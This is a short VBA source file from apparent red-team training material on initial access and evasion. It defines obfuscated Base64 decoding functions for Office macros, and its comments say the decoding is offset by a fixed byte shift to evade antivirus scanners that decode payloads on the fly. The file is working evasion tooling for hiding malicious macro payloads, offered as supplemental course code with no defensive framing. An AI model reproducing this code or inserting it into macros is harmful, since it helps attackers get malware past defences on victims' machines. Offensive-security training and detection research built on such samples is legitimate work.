'#
'# Copyright (C) Binary-Offensive.com Mariusz Banach - All Rights Reserved
'# Unauthorized copying of this file, via any medium is strictly prohibited.
'#
'# This file/directory was part of Modern Initial Access and Evasion Tactics training
'# delivered by binary-offensive.com and was provided as supplemental material.
'# 
'# Authored by Mariusz Banach <mb@binary-offensive.com>, @mariuszbit / mgeeky
'#


' Base64 decoder
Private Function obf_DecodeBase64(ByVal obf_EncodedData As String) As Byte()
    On Error GoTo obf_ProcError
    Dim obf_XmlDom, obf_XmlNode, obf_Decoded, obf_Counter
    Set obf_XmlDom = CreateObject("new:2933BF90-7B36-11D2-B20E-00C04F983E60")
    Set obf_XmlNode = obf_XmlDom.createElement("obf_someInternalName")
    obf_XmlNode.DataType = "bin.base64"
    obf_XmlNode.Text = obf_EncodedData
    obf_Decoded = obf_XmlNode.NodeTypedValue

    ' This for-loop adjusts each byte by adding +35 to evade AVs capable of
    ' base64-decoding in-the-fly
    For obf_Counter = LBound(obf_Decoded) To UBound(obf_Decoded)
        obf_Decoded(obf_Counter) = (obf_Decoded(obf_Counter) + 35) Mod 256
    Next
    obf_DecodeBase64 = obf_Decoded
    Exit Function
obf_ProcError:
End Function

Private Function obf_DecodeBaseText64(ByVal obf_EncodedData As String) As String
    Dim obf_temp() As Byte
    obf_temp = obf_DecodeBase64(obf_EncodedData)
    obf_DecodeBaseText64 = StrConv(obf_temp, vbUnicode)
End Function
